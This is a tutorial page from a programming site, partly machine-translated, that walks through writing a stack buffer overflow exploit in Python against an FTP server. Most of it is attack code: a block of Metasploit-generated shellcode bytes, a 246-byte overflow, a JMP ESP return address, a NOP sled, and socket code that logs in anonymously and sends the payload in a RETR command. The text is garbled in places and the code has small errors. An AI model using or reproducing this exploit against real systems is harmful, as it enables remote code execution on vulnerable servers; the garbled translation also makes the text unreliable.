程序師世界是廣大編程愛好者互助、分享、學習的平台,程序師世界有你更精彩!
首頁
編程語言
C語言|JAVA編程
Python編程
網頁編程
ASP編程|PHP編程
JSP編程
數據庫知識
MYSQL數據庫|SqlServer數據庫
Oracle數據庫|DB2數據庫
您现在的位置: 程式師世界 >> 編程語言 >  >> 更多編程語言 >> Python

[Advanced Python scripting] 2.5. Write your own 0day proof-of-concept code: stack buffer overflow attack, add key elements of attack, and send exploit code

編輯:Python

目錄

一、概述

二、Stack-based buffer overflow attack

2.1、簡介:

2.2、基本術語:

三、Add key elements of your attack

 3.1、實現:

四、發送漏洞利用代碼

4.1、分析:

4.2、實現:


一、概述

雖然在MetasploitThe framework's tool library contains more than 800different exploit codes, But you still have a moment when you have to write the remote exploit code yourself.用Python簡化這個過程,First understand the stack-based buffer overflow


MorrisThe reason for the worm's success is, to some extent, the use of stack buffer overflows.Such vulnerabilities can be successfully exploited, It is caused by thousands of programs failing to filter or validate user input.



二、Stack-based buffer overflow attack

2.1、簡介:

in stack-based buffer overflow, Unchecked user data overwrites the next instruction pointer to be executed(EIP)way to control the flow of execution of a program.This exploit code will directly let EIPThe register points to what was inserted by the attackersbellcode上的某個位置.A sequence of machine code instructions(也稱sbellcode)Will let the exploit code add additional users to the target system, Establish a network connection with the attacker, Or download a standalone executable.


ShellcodeThe size is almost unlimited, Its size depends only on the amount of available memory space.There are many different ways to use different types of wither holes today, And stack-based buffer overflow is one of the most
基本的.

2.2、基本術語:

溢出: The length of the user's input exceeds the stack's expected maximum length, That is, the size of the allocated memory


返回地址:Used to jump directly to the top of the stack4B的地址.The following vulnerabilities are being exploited, will use one inkernel32.dl中某條JMP ESP指令的地址(指針的長度為4B).
Padding:在shellcode之前的一系列NOP(無操作)指令, It makes the attacker predict to jump directly there
的地址時, Accuracy requirements can be relaxed.as long as it jumps toNOPanywhere in the chain, can be slid directly toshellcode那裡.
shellcode: A small piece of machine code written in assembly language.在下面的例子中, 我們用Metasploit框架生成
shellcode.



三、Add key elements of your attack

 3.1、實現:

Start writing key elements in your exploit code.

首先, 我們在shellcodeWrite to the variableMetasploitThe hex code of the payload generated by the framework.

然後, 在overflowChange sting in writing246個字母“ A"(十六進制值是\x41).

take overret變量指向kernel32.dllOne of them contains the address of an instruction that jumps control flow directly to the top of the stack.我們的paddingvariable is150個NOP指令.這就構成了NOP鏈.

最後,Combining all these variables together forms what we call crash的變量.

shellcode = ("\xbf\x5c\x2a\x11\xb3\xd9\xe5\xd9\x74\x24\xf4\x5d\x33\xc9"
"\xb1\x56\x83\xc5\x04\x31\x7d\x0f\x03\x7d\x53\xc8\xe4\x4f"
"\x83\x85\x07\xb0\x53\xf6\x8e\x55\x62\x24\xf4\x1e\xd6\xf8"
"\x7e\x72\xda\x73\xd2\x67\x69\xf1\xfb\x88\xda\xbc\xdd\xa7"
"\xdb\x70\xe2\x64\x1f\x12\x9e\x76\x73\xf4\x9f\xb8\x86\xf5"
"\xd8\xa5\x68\xa7\xb1\xa2\xda\x58\xb5\xf7\xe6\x59\x19\x7c"
"\x56\x22\x1c\x43\x22\x98\x1f\x94\x9a\x97\x68\x0c\x91\xf0"
"\x48\x2d\x76\xe3\xb5\x64\xf3\xd0\x4e\x77\xd5\x28\xae\x49"
"\x19\xe6\x91\x65\x94\xf6\xd6\x42\x46\x8d\x2c\xb1\xfb\x96"
"\xf6\xcb\x27\x12\xeb\x6c\xac\x84\xcf\x8d\x61\x52\x9b\x82"
"\xce\x10\xc3\x86\xd1\xf5\x7f\xb2\x5a\xf8\xaf\x32\x18\xdf"
"\x6b\x1e\xfb\x7e\x2d\xfa\xaa\x7f\x2d\xa2\x13\xda\x25\x41"
"\x40\x5c\x64\x0e\xa5\x53\x97\xce\xa1\xe4\xe4\xfc\x6e\x5f"
"\x63\x4d\xe7\x79\x74\xb2\xd2\x3e\xea\x4d\xdc\x3e\x22\x8a"
"\x88\x6e\x5c\x3b\xb0\xe4\x9c\xc4\x65\xaa\xcc\x6a\xd5\x0b"
"\xbd\xca\x85\xe3\xd7\xc4\xfa\x14\xd8\x0e\x8d\x12\x16\x6a"
"\xde\xf4\x5b\x8c\xf1\x58\xd5\x6a\x9b\x70\xb3\x25\x33\xb3"
"\xe0\xfd\xa4\xcc\xc2\x51\x7d\x5b\x5a\xbc\xb9\x64\x5b\xea"
"\xea\xc9\xf3\x7d\x78\x02\xc0\x9c\x7f\x0f\x60\xd6\xb8\xd8"
"\xfa\x86\x0b\x78\xfa\x82\xfb\x19\x69\x49\xfb\x54\x92\xc6"
"\xac\x31\x64\x1f\x38\xac\xdf\x89\x5e\x2d\xb9\xf2\xda\xea"
"\x7a\xfc\xe3\x7f\xc6\xda\xf3\xb9\xc7\x66\xa7\x15\x9e\x30"
"\x11\xd0\x48\xf3\xcb\x8a\x27\x5d\x9b\x4b\x04\x5e\xdd\x53"
"\x41\x28\x01\xe5\x3c\x6d\x3e\xca\xa8\x79\x47\x36\x49\x85"
"\x92\xf2\x79\xcc\xbe\x53\x12\x89\x2b\xe6\x7f\x2a\x86\x25"
"\x86\xa9\x22\xd6\x7d\xb1\x47\xd3\x3a\x75\xb4\xa9\x53\x10"
"\xba\x1e\x53\x31")
overflow = "\x41" * 246
ret = struct.pack ('<L', Ox7C874413) #7C874413 JMP ESP kernel32.dll
padding = "\x90" * 150
crash = overflow + ret + padding + shellcode


四、發送漏洞利用代碼

4.1、分析:

使用Berkeley Socket APL can be used with the target hostTCP 21 Port creates a connection.如果成功連接,Log in to the host anonymously.最後會發送FTP命令'RETR", 後面接上crash 變量.Because the affected program cannot properly check user input, This causes a stack-based buffer overflow, 它會覆蓋EIP寄存器, Make the program jump directly toshellcode 那裡, 並執行它

4.2、實現:

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((target, 21))
except:
print('[-]Connection to ' + target + 'failed!')
sys.exit(0)
print('[*] Sending ' + 'len(crash)' + ' '+ command + ' byte crash... ')
s.send("USER anonymous\r\n")
s.recv(1024)
s.send('PASS \r\n')
s.recv(1024)
s.send('RETR' + ' ' + crash + '\r\n')
time.sleep(4)


  1. 上一篇文章:
  2. 下一篇文章:
Copyright © 程式師世界 All Rights Reserved